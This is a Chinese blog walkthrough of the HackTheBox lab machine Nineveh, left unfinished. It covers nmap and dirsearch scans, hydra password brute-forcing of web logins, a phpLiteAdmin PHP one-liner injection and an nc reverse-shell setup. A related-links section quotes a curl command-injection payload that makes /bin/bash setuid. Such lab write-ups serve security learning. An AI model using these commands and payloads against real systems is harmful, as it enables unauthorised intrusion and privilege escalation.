e02f7fdbb400
e02f7fdbb400

hackthebox Nineveh

nmap -sC -sV -oA  nmap 10.10.10.43

探测操作系统服务及相关版本,并保存为nmap.nmap.


hackthebox Nineveh_第1张图片
image.png

根据ssl-cert可看到主机名。
编辑 /etc/hosts 配置ip及对应主机名

vi /etc/hosts
10.10.10.43  nineveh
hackthebox Nineveh_第2张图片
image.png

hackthebox Nineveh_第3张图片
image.png

hackthebox Nineveh_第4张图片
image.png

HTTP协议传输的数据都是未加密的,也就是明文的,因此使用HTTP协议传输隐私信息非常不安全,为了保证这些隐私数据能加密传输,于是网景公司设计了SSL(Secure Sockets Layer)协议用于对HTTP协议传输的数据进行加密,从而就诞生了HTTPS。
简单来说,HTTPS协议是由SSL+HTTP协议构建的可进行加密传输、身份认证的网络协议,要比http协议安全。

dirsearch.py -u https://nineveh.htb -e *
dirsearch.py -u nineveh.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e *
hackthebox Nineveh_第5张图片
image.png
hackthebox Nineveh_第6张图片
image.png

hackthebox Nineveh_第7张图片
image.png

使用hydra爆破


hackthebox Nineveh_第8张图片
image.png

hackthebox Nineveh_第9张图片
image.png 
hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/10k_most_common.txt 10.10.10.43 http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64

hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/10k_most_common.txt 10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -t 64
hackthebox Nineveh_第10张图片
image.png

hackthebox Nineveh_第11张图片
image.png

成功爆破到密码


image.png

未爆破到db密码 更换字典尝试

grep -i ^password /usr/shark/wordlists/rockyou.txt >pw

hydra -l admin -P pw10.10.10.43 https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect" -t 64

爆破到db密码为password123,发现为phpliteadmin系统,搜索下以前的漏洞

searchsploit phpliteadmin
hackthebox Nineveh_第12张图片
image.png
hackthebox Nineveh_第13张图片
image.png

创建新数据库并已php为扩展名,创建表写入php一句话。
hackthebox Nineveh_第14张图片
image.png

只能重命名为ninevehNotes.php 。根据提示更改下一句话
hackthebox Nineveh_第15张图片
image.png

根据提示更改下一句话
hackthebox Nineveh_第16张图片
image.png

利用nc getshell

nc -lvpn 9999

反向shell获取参考http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

hackthebox Nineveh_第17张图片
image.png

将其转换成交互式的shell,方便运行su。在终端中执行: 

python -c 'import pty;pty.spawn('/bin/bash')'

python2没有spawn,我们使用python3

python3 -c 'import pty;pty.spawn("/bin/bash")'
hackthebox Nineveh_第18张图片
image.png

我们需要设置tty 保证我们在nc shell 上与终端完全交互,以便使用所有功能(tab-complete,history,job control等):

参考:如何将简单的Shell转换成为完全交互式的TTY
http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/3529.html

未完待续

你可能感兴趣的:(hackthebox Nineveh)

  • hackthebox Busqueda EASY难度 一把梭哈 安河桥北2025 linuxbash运维安全
    自动执行sudo命令,自动给sudo命令输入密码:jh1usoih2bkjaspwe92curl-v-d"engine=Accuweather&query=1'%2bprint(eval(__import__('os').system('tac/home/svc/user.txt;cd/tmp;echo\"#\x21/bin/bash\nchmod%2bs/bin/bash\">full-chec
  • 网络安全在线网站/靶场:全面探索与实践 小熊同学哦 网络安全web安全安全网络网络安全系统安全计算机网络
    目录1.CyberPatriot简介功能与特点适用人群2.HackTheBox简介功能与特点适用人群3.OverTheWire简介功能与特点适用人群4.VulnHub简介功能与特点适用人群5.PortSwiggerWebSecurityAcademy简介功能与特点适用人群6.TryHackMe简介功能与特点适用人群7.CTFTime简介功能与特点适用人群8.WebGoat简介功能与特点适用人群结论
  • hackthebox-Oouch byc_404
    Oouch靶机的难度相比最近做完的两个hardmachineQuick跟Forwardslash而言有过之而无不及。甚至于感觉可能接近到Insane难度了。从web界面下手时遇到很多不稳定的问题,而之后从user提权到root更是出现玄学问题,一模一样的的payload头一天失败第二天就成了。但是总归学到了不少新知识,所以赶紧总结下。由于Oouch还是active状态,所以我会给文章上锁直到靶机退
  • 入门渗透:FTP入侵——Fawn 栉风沐雪 入门渗透测试服务器linux运维
    一般sftp和由ssh进行加密共同运行于22端口遇到没有进行加密的ftp一般运行于21端口,此处靶机为简单的ftp服务使用的是hackthebox的Fawn靶机一、连接启动Fawn靶机得到的ip为10.129.18.61二、通过ICMP协议检测是否存活ping目标ip地址,发现其存活,开始接下来的nmap扫描三、探查端口服务先使用简单的nmap扫描可以发现在21号端口上开启了ftp服务,再次使用-
  • 【HackTheBox】dancing(SMB) 开心星人 HackTheBoxhackthebox
    先说个踩坑open文件名.o用这个命令打开结果是打不开,直接退出来了要不然就是死循环,一直等就这样弄了一个小时左右,一直试最后,是tcp换成udp,解决了1、SMB是什么意思?ServerMessageBlock–SMB,是一种文件共享协议。当文件原件在你的A电脑上,而你想在局域网下用你的手机、iPad或是另一台电脑来访问A电脑上的该文件时,你可能需要用到SMB共享。ServerMessageBl
  • HackTheBox-BountyHunter靶场通关记录 HU芦娃 信息安全漏洞原理打靶记录安全
    文章目录HackTheBox-BountyHunter靶场准备工作信息搜集漏洞利用提权HackTheBox-BountyHunter靶场准备工作打开hackthebox并找到bountyhunter靶场,关注并获取到IP地址在hackthebox中下载Kali虚拟机,并运行指定的信息搜集我拿到的IP地址为:10.10.11.100使用nmap进行端口扫描,看看开放了哪些端口。sudonmap-Pn
  • Hackthebox Shoppy攻略 bruce121385 web安全安全网络安全系统安全
    免责声明:本教程仅限学术讨论使用,请勿作用于非法用途!!!如有用于非法用途,本人概不负责。一、信息收集1、端口扫描发现两个端口:22、80;其中80端口扫描后发现其重定向至域名http://shoppy.htb我们将域名添加至/etc/hosts中,使kali可以解析。2、子域名收集我们发现一个域名,所以我们可以尝试是否存在子域名。找到子域名mattermost.shoppy.htb,并将其添加到
  • [原创]夺棋赛HackTheBox OpenSource攻略 huandaohack 安全安全web安全网络
    最近很忙,方案,建模大赛的技术支持,再忙也不忘自身的修行学习,都是抽取下班后晚上的时间做的,搞了4天,最终拿下棋子。简介HackTheBox(缩写HTB),HTB是一个网络安全攻防竞技场,全球的顶尖高手很多在上面,有人在上面出题(防守),就有人解题(攻击)。想提高网络攻防水平就来玩这个game平台。这个平台一个优点是靶机是现成的,也是免费的。同样VulnHub也很出名,但VulnHub要自己下载虚
  • HACKTHEBOX通关笔记——mango(退役) AttackSatelliteLab 笔记
    信息收集端口扫描┌──(root㉿kali)-[~]└─#nmap-sC-sV-A-p---min-rate=1000010.129.229.185StartingNmap7.94SVN(https://nmap.org)at2024-01-3120:44ESTWarning:10.129.229.185givinguponportbecauseretransmissioncaphit(10).N
  • [靶场]HackTheBox Sau shangwenDD 渗透测试安全web安全网络安全
    HackTheBoxSau启动靶机之后拿到靶机的ip,这里我建议在连接靶场VPN的时候把tcp和udp的两个协议的配置文件都下载下来,然后分别在kali和windows上面使用,这样就不会导致ip冲突,反复掉线的情况。连接靶机漏洞扫描nmap扫描端口nmap-p---min-rate500010.10.11.224发现端口如下漏洞发现其中55555端口比较可疑,我们在web端访问试一下主要看到Po
  • HACKTHEBOX通关笔记——Poison(退役) AttackSatelliteLab 笔记
    调试网络连通性拿到IP我们还是做一下nmap扫描,快速速率扫描结合-A详细扫描,事半功倍nmap--rate-min5000-p- 10.129.58.204-vnmap-A-p22,8010.129.58.204-v发现http是一个可以读取文件的页面这台主机似乎没办法做目录扫描,一扫就断网,只好一个一个查看这些php文件了,php.ini中发现上传和打开权限开启,文件包含权限关闭看文件时候发现
  • HACKTHEBOX通关笔记——Cronos(退役) AttackSatelliteLab 笔记
    开启环境,调试网络确保互联互通拿到IP之后还是先来做一下端口扫描,nmap--rate-min=5000-p--vip,也可以加个-Pn做下禁ping扫描,当然这个速率很快,实际攻防时候加了pn参数也是容易被发现的,所以对抗时候还是要做IP代理扫描。拿到端口信息后详细扫一下nmap-A-p22,80,53-vip没发现什么可用信息,只好先从80入手,尝试访问发现是个默认页面,目录扫描也没什么成果,
  • No.20-基础-渗透学习 大余xiyou linuxpython人工智能java编程语言
    **基础篇**目标:通关vulnhub平台上的靶机作者:大余时间:2020-01-17请注意:对于所有这些计算机,我已经使用VMware运行下载的计算机。我将使用KaliLinux作为解决该CTF的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。一、练习平台想渗透入门的小伙伴,建议已下平台最少练熟30~50台以上,熟悉渗透思路。HackTheBox:htt
  • HackTheBox - Medium - Linux - Noter Sugobet HackTheBoxHackTheBoxLinux渗透测试网络安全配置错误
    NoterNoter是一种中型Linux机器,其特点是利用了PythonFlask应用程序,该应用程序使用易受远程代码执行影响的“节点”模块。由于“MySQL”守护进程以用户“root”身份运行,因此可以通过利用“MySQL”的用户定义函数来利用它来获得RCE并将我们的权限升级到“root”。外部信息收集端口扫描循例nmapWeb枚举注册个账号直接登进去逛一圈没有常见的漏洞点base64解码fla
  • hackthebox - lazy (考点:Padding oracle attack & 环境变量提权 ) 冬萍子
    1扫描常规,22想到可能有ssh登录,80进web搜集信息PORTSTATESERVICEVERSION22/tcpopensshOpenSSH6.6.1p1Ubuntu2ubuntu2.8(UbuntuLinux;protocol2.0)|ssh-hostkey:|1024e1:92:1b:48:f8:9b:63:96:d4:e5:7a:40:5f:a4:c8:33(DSA)|2048af:a0
  • 【HTB-Sherlocks-OpTinselTrace-3 WP 应急响应-内存取证】 Asymptote_tanaka 网络安全-应急网络安全
    连接:HackTheBox文件下载解压后是一个内存文件santaclaus.bin,使用vol3去进行内存取证,因为该内存镜像是win10版本的1.Whatisthenameofthefilethatislikelycopiedfromthesharedfolder(includingthefileextension)?【可能从共享文件夹复制的文件的名称是什么(包括文件扩展名)?】使用命令vol.
  • HackTheBox - Medium - Linux - Health Sugobet HackTheBox网络安全HackTheBoxlinux渗透测试配置错误
    HealthHealth是一台中型Linux计算机,在主网页上存在SSRF漏洞,可利用该漏洞访问仅在localhost上可用的服务。更具体地说,Gogs实例只能通过localhost访问,并且此特定版本容易受到SQL注入攻击。由于攻击者可以与Gogs实例交互的方式,在这种情况下,最好的方法是通过在本地计算机上安装相同的Gogs版本,然后使用自动化工具生成有效的有效负载来复制远程环境。在检索用户“s
  • HackTheBox - Medium - Linux - Mentor Sugobet HackTheBoxHackTheBox网络安全linux渗透测试配置错误
    MentorMentor是一台中等难度的Linux机器,其路径包括在到达root之前在四个不同的用户之间切换。使用可暴力破解的社区字符串扫描“SNMP”服务后,会发现用于“API”端点的明文凭据,该端点被证明容易受到盲目远程代码执行的影响,并导致在docker容器上站稳脚跟。枚举容器'的网络在另一个容器上显示“PostgreSQL”服务,可以通过使用默认凭据进行身份验证来将其用于RCE。检查“Po
  • HackTheBox - Medium - Windows - Scrambled Sugobet HackTheBoxHackTheBox网络安全Windows渗透测试域渗透
    Scrambled最近身体有些不舒服,恐怕理论值要与现实产生较大偏差了Scrambled是一台中型WindowsActiveDirectory计算机。通过枚举远程计算机上托管的网站,潜在攻击者能够推断出用户“ksimpson”的凭据。该网站还指出NTLM身份验证已禁用,这意味着将使用Kerberos身份验证。使用“ksimpson”的凭据访问“Public”共享时,PDF文件指出攻击者检索了SQL
  • HackTheBox - Medium - Linux - Faculty Sugobet HackTheBoxHackTheBoxLinux渗透测试网络安全配置错误
    FacultyFaculty是一台中型Linux机器,具有PHPWeb应用程序,该应用程序使用的库容易受到本地文件包含的影响。利用该库中的LFi会泄露一个密码,该密码可用于通过SSH以名为“gbyolo”的低级用户身份登录。用户“gbyolo”有权作为“developer”用户运行名为“meta-git”的“npm”包。此机器上安装的“meta-git”版本容易受到代码注入攻击,可利用该版本将权限
  • [渗透测试学习] Hospital - HackTheBox _rev1ve 学习web安全网络安全
    文章目录信息搜集getshell提权信息搜集nmap扫描一下端口发现8080端口和443端口有http服务然后发现3389端口是启用了ms-wbt-server服务在对443端口的扫描没有收获,并且只有邮箱登录界面无法注册接着看向8080端口,我们随便注册用户登录后发现有文件上传功能getshell经过测试pht和phar后缀都可以绕过检测,然后dirsearch扫描出文件上传路径为
  • [渗透测试学习] Surveillance -HackTheBox _rev1ve 学习网络安全web安全
    文章目录信息搜集getshell提权信息搜集nmap扫描端口nmap-sV-sC-v-p---min-rate100010.10.11.245扫出来两个端口,其中80端口有http服务并且重定向到surveillance.htb那么我们添加下域名然后访问80端口,发现是企业网站尝试扫描子域名和目录无果后,用Wappalyzer插件看看得知是CraftCMS后,去网上搜一下发现存在远程代码执行漏洞(
  • [渗透测试学习]Three - HackTheBox _rev1ve 学习web安全安全网络
    文章目录Task1Task2Task3Task4Task5Task6Task7Task8Task9Task10本靶机考察的是AWS服务Task1问题:打开了多少个TCP端口?2nmap扫一下Task2问题:网站“联系人”部分提供的电子邮
  • hackthebox-sauna (域渗透/bloodhound使用/mimikatz使用/secretsdump.py、psexec使用) 冬萍子
    1、扫描先masscan全局快速扫,再namp精细扫masscan-p1-65535,U:1-6553510.10.10.175--rate=1000-etun0nmap-A10.10.10.175-p389,5985,445,53,139,49667,636,135,88,49673,49674,80,464,52613,593,49676可见开了很多端口,而88389这都是域端口,389后面也
  • HTB-sau Walkthrough yunsaijc 靶机Walkthrough安全
    原文:个人主页原文运行环境:macOS13.2.1;ParallelDesktop:KaliLinux2022.2ARM64;Windows11靶机链接:https://app.hackthebox.com/machines/Sau过程信息收集基础的四项扫描:在端口扫描时,采用默认的-sS方式,能够扫到-sT方式扫不到的80和8338端口:扫描完成后,进行子目录爆破:Web部分进入hostname
  • HTB靶场系列 linux靶机 Tartarsause靶机 万天峰 linux服务器运维
    勘探nmap直接扫root@kali:~/hackthebox/tartarsauce-10.10.10.88#nmap10.10.10.88StartingNmap7.70(https://nmap.org)at2018-05-2212:21EDTWarning:10.10.10.88givinguponportbecauseretransmissioncaphit(10).Nmapscanre
  • HackTheBox系列-Sau 夜白君 HackTheBox网络安全靶机HTB漏洞复现
    Sau0x01信息收集1、使用nmap进行端口扫描nmap-p---min-rate1000010.10.11.224nmap-sV-sC-A-p22,80,8338,5555510.10.11.2242、发现除了22端口ssh外,唯一开放的端口55555上跑着Http服务,使用浏览器进行访问发现是一个request-baskets|Version:1.2.1的服务3、使用google进行搜索关于
  • HackTheBox-Keeper YAy17 HackTheBox安全web安全网络网络安全学习
    OpenVPN连接连接上HackTheBox!同时找到这个靶机,进行join!分配的靶机的地址位10.10.11.227!信息收集nmap-sT--min-rate10000-p-10.10.11.227开放端口为22和80端口服务版本和操作系统信息探测:nmap-sV-sC-O-p22,8010.10.11.227Nmapscanreportfortickets.keeper.htb(10.10
  • [渗透测试学习] Responder - HackTheBox _rev1ve 学习安全web安全网络
    文章目录靶机:ResponderTask1Task2Task3Task4Task5Task6Task7Task8Task9Task10Task11靶机:Responder考察的是WinRM服务Task1问题:当使用IP地址访问web服务时,我们被重定向到的域是什么?uni
  • [渗透测试学习] Crocodile - HackTheBox _rev1ve 学习web安全网络安全
    文章目录靶机:CrocodileTask1Task2Task3Task4Task5Task6Task7Task8Task9Task10靶机:Crocodile考察的是FTP传输协议相关知识Task1问题:在扫描过程中,什么NMAP扫描开关使用默认脚本?-sCTask2问题
  • 辗转相处求最大公约数 沐刃青蛟 C++漏洞
    无言面对”江东父老“了,接触编程一年了,今天发现还不会辗转相除法求最大公约数。惭愧惭愧!   为此,总结一下以方便日后忘了好查找。   1.输入要比较的两个数a,b   忽略:2.比较大小(因为后面要的是大的数对小的数做%操作)   3.辗转相除(用循环不停的取余,如a%b,直至b=0)   4.最后的a为两数的最大公约数 &
  • F5负载均衡会话保持技术及原理技术白皮书 bijian1013 F5负载均衡
    一.什么是会话保持?        在大多数电子商务的应用系统或者需要进行用户身份认证的在线系统中,一个客户与服务器经常经过好几次的交互过程才能完成一笔交易或者是一个请求的完成。由于这几次交互过程是密切相关的,服务器在进行这些交互过程的某一个交互步骤时,往往需要了解上一次交互过程的处理结果,或者上几步的交互过程结果,服务器进行下
  • Object.equals方法:重载还是覆盖 Cwind javagenericsoverrideoverload
    本文译自StackOverflow上对此问题的讨论。 原问题链接   在阅读Joshua Bloch的《Effective Java(第二版)》第8条“覆盖equals时请遵守通用约定”时对如下论述有疑问: “不要将equals声明中的Object对象替换为其他的类型。程序员编写出下面这样的equals方法并不鲜见,这会使程序员花上数个小时都搞不清它为什么不能正常工作:” pu
  • 初始线程 15700786134
          暑假学习的第一课是讲线程,任务是是界面上的一条线运动起来。            既然是在界面上,那必定得先有一个界面,所以第一步就是,自己的类继承JAVA中的JFrame,在新建的类中写一个界面,代码如下: public class ShapeFr
  • Linux的tcpdump 被触发 tcpdump
    用简单的话来定义tcpdump,就是:dump the traffic on a network,根据使用者的定义对网络上的数据包进行截获的包分析工具。 tcpdump可以将网络中传送的数据包的“头”完全截获下来提供分析。它支 持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。 实用命令实例 默认启动 tcpdump 普通情况下,直
  • 安卓程序listview优化后还是卡顿 肆无忌惮_ ListView
    最近用eclipse开发一个安卓app,listview使用baseadapter,里面有一个ImageView和两个TextView。使用了Holder内部类进行优化了还是很卡顿。后来发现是图片资源的问题。把一张分辨率高的图片放在了drawable-mdpi文件夹下,当我在每个item中显示,他都要进行缩放,导致很卡顿。解决办法是把这个高分辨率图片放到drawable-xxhdpi下。 &nb
  • 扩展easyUI tab控件,添加加载遮罩效果 知了ing jquery
    (function () { $.extend($.fn.tabs.methods, { //显示遮罩 loading: function (jq, msg) { return jq.each(function () { var panel = $(this).tabs(&
  • gradle上传jar到nexus 矮蛋蛋 gradle
    原文地址: https://docs.gradle.org/current/userguide/maven_plugin.html configurations {     deployerJars } dependencies {     deployerJars "org.apache.maven.wagon
  • 千万条数据外网导入数据库的解决方案。 alleni123 sqlmysql
    从某网上爬了数千万的数据,存在文本中。 然后要导入mysql数据库。 悲剧的是数据库和我存数据的服务器不在一个内网里面。。 ping了一下, 19ms的延迟。 于是下面的代码是没用的。 ps = con.prepareStatement(sql); ps.setString(1, info.getYear())............; ps.exec
  • JAVA IO InputStreamReader和OutputStreamReader 百合不是茶 JAVA.io操作 字符流
    这是第三篇关于java.io的文章了,从开始对io的不了解-->熟悉--->模糊,是这几天来对文件操作中最大的感受,本来自己认为的熟悉了的,刚刚在回想起前面学的好像又不是很清晰了,模糊对我现在或许是最好的鼓励 我会更加的去学 加油!: JAVA的API提供了另外一种数据保存途径,使用字符流来保存的,字符流只能保存字符形式的流   字节流和字符的难点:a,怎么将读到的数据
  • MO、MT解读 bijian1013 GSM
    MO= Mobile originate,上行,即用户上发给SP的信息。MT= Mobile Terminate,下行,即SP端下发给用户的信息; 上行:mo提交短信到短信中心下行:mt短信中心向特定的用户转发短信,你的短信是这样的,你所提交的短信,投递的地址是短信中心。短信中心收到你的短信后,存储转发,转发的时候就会根据你填写的接收方号码寻找路由,下发。在彩信领域是一样的道理。下行业务:由SP
  • 五个JavaScript基础问题 bijian1013 JavaScriptcallapplythisHoisting
    下面是五个关于前端相关的基础问题,但却很能体现JavaScript的基本功底。 问题1:Scope作用范围 考虑下面的代码:  (function() { var a = b = 5; })(); console.log(b); 什么会被打印在控制台上?  回答:         上面的代码会打印 5。 &nbs
  • 【Thrift二】Thrift Hello World bit1129 Hello world
    本篇,不考虑细节问题和为什么,先照葫芦画瓢写一个Thrift版本的Hello World,了解Thrift RPC服务开发的基本流程   1. 在Intellij中创建一个Maven模块,加入对Thrift的依赖,同时还要加上slf4j依赖,如果不加slf4j依赖,在后面启动Thrift Server时会报错 <dependency>
  • 【Avro一】Avro入门 bit1129 入门
    本文的目的主要是总结下基于Avro Schema代码生成,然后进行序列化和反序列化开发的基本流程。需要指出的是,Avro并不要求一定得根据Schema文件生成代码,这对于动态类型语言很有用。   1. 添加Maven依赖   <?xml version="1.0" encoding="UTF-8"?> <proj
  • 安装nginx+ngx_lua支持WAF防护功能 ronin47
    需要的软件:LuaJIT-2.0.0.tar.gz                   nginx-1.4.4.tar.gz          &nb
  • java-5.查找最小的K个元素-使用最大堆 bylijinnan java
    import java.util.Arrays; import java.util.Random; public class MinKElement { /** * 5.最小的K个元素 * I would like to use MaxHeap. * using QuickSort is also OK */ public static void
  • TCP的TIME-WAIT bylijinnan socket
    原文连接: http://vincent.bernat.im/en/blog/2014-tcp-time-wait-state-linux.html 以下为对原文的阅读笔记 说明: 主动关闭的一方称为local end,被动关闭的一方称为remote end 本地IP、本地端口、远端IP、远端端口这一“四元组”称为quadruplet,也称为socket 1、TIME_WA
  • jquery ajax 序列化表单 coder_xpf Jquery ajax 序列化
       checkbox 如果不设定值,默认选中值为on;设定值之后,选中则为设定的值   <input type="checkbox" name="favor" id="favor" checked="checked"/> $("#favor&quo
  • Apache集群乱码和最高并发控制 cuisuqiang apachetomcat并发集群乱码
    都知道如果使用Http访问,那么在Connector中增加URIEncoding即可,其实使用AJP时也一样,增加useBodyEncodingForURI和URIEncoding即可。 最大连接数也是一样的,增加maxThreads属性即可,如下,配置如下: <Connector maxThreads="300" port="8019" prot
  • websocket dalan_123 websocket
    一、低延迟的客户端-服务器 和 服务器-客户端的连接 很多时候所谓的http的请求、响应的模式,都是客户端加载一个网页,直到用户在进行下一次点击的时候,什么都不会发生。并且所有的http的通信都是客户端控制的,这时候就需要用户的互动或定期轮训的,以便从服务器端加载新的数据。   通常采用的技术比如推送和comet(使用http长连接、无需安装浏览器安装插件的两种方式:基于ajax的长
  • 菜鸟分析网络执法官 dcj3sjt126com 网络
      最近在论坛上看到很多贴子在讨论网络执法官的问题。菜鸟我正好知道这回事情.人道"人之患好为人师" 手里忍不住,就写点东西吧. 我也很忙.又没有MM,又没有MONEY....晕倒有点跑题. OK,闲话少说,切如正题. 要了解网络执法官的原理. 就要先了解局域网的通信的原理. 前面我们看到了.在以太网上传输的都是具有以太网头的数据包. 
  • Android相对布局属性全集 dcj3sjt126com android
    RelativeLayout布局android:layout_marginTop="25dip" //顶部距离android:gravity="left" //空间布局位置android:layout_marginLeft="15dip //距离左边距 // 相对于给定ID控件android:layout_above 将该控件的底部置于给定ID的
  • Tomcat内存设置详解 eksliang jvmtomcattomcat内存设置
    Java内存溢出详解   一、常见的Java内存溢出有以下三种:   1. java.lang.OutOfMemoryError: Java heap space ----JVM Heap(堆)溢出JVM在启动的时候会自动设置JVM Heap的值,其初始空间(即-Xms)是物理内存的1/64,最大空间(-Xmx)不可超过物理内存。 可以利用JVM提
  • Java6 JVM参数选项 greatwqs javaHotSpotjvmjvm参数JVM Options
    Java 6 JVM参数选项大全(中文版)   作者:Ken Wu Email: [email protected] 转载本文档请注明原文链接 http://kenwublog.com/docs/java6-jvm-options-chinese-edition.htm!   本文是基于最新的SUN官方文档Java SE 6 Hotspot VM Opt
  • weblogic创建JMC i5land weblogicjms
    进入 weblogic控制太 1.创建持久化存储 --Services--Persistant Stores--new--Create FileStores--name随便起--target默认--Directory写入在本机建立的文件夹的路径--ok 2.创建JMS服务器 --Services--Messaging--JMS Servers--new--name随便起--Pers
  • 基于 DHT 网络的磁力链接和BT种子的搜索引擎架构 justjavac DHT
    上周开发了一个磁力链接和 BT 种子的搜索引擎 {Magnet & Torrent},本文简单介绍一下主要的系统功能和用到的技术。 系统包括几个独立的部分: 使用 Python 的 Scrapy 框架开发的网络爬虫,用来爬取磁力链接和种子; 使用 PHP CI 框架开发的简易网站; 搜索引擎目前直接使用的 MySQL,将来可以考虑使
  • sql添加、删除表中的列 macroli sql
    添加没有默认值:alter table Test add BazaarType char(1) 有默认值的添加列:alter table Test add BazaarType char(1) default(0) 删除没有默认值的列:alter table Test drop COLUMN BazaarType 删除有默认值的列:先删除约束(默认值)alter table Test DRO
  • PHP中二维数组的排序方法 abc123456789cba 排序二维数组PHP
    <?php/*** @package     BugFree* @version     $Id: FunctionsMain.inc.php,v 1.32 2005/09/24 11:38:37 wwccss Exp $*** Sort an two-dimension array by some level
  • hive优化之------控制hive任务中的map数和reduce数 superlxw1234 hivehive优化
    一、    控制hive任务中的map数: 1.    通常情况下,作业会通过input的目录产生一个或者多个map任务。 主要的决定因素有: input的文件总个数,input的文件大小,集群设置的文件块大小(目前为128M, 可在hive中通过set dfs.block.size;命令查看到,该参数不能自定义修改);2. 
  • Spring Boot 1.2.4 发布 wiselyman spring boot
    Spring Boot 1.2.4已于6.4日发布,repo.spring.io and Maven Central可以下载(推荐使用maven或者gradle构建下载)。   这是一个维护版本,包含了一些修复small number of fixes,建议所有的用户升级。   Spring Boot 1.3的第一个里程碑版本将在几天后发布,包含许多
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他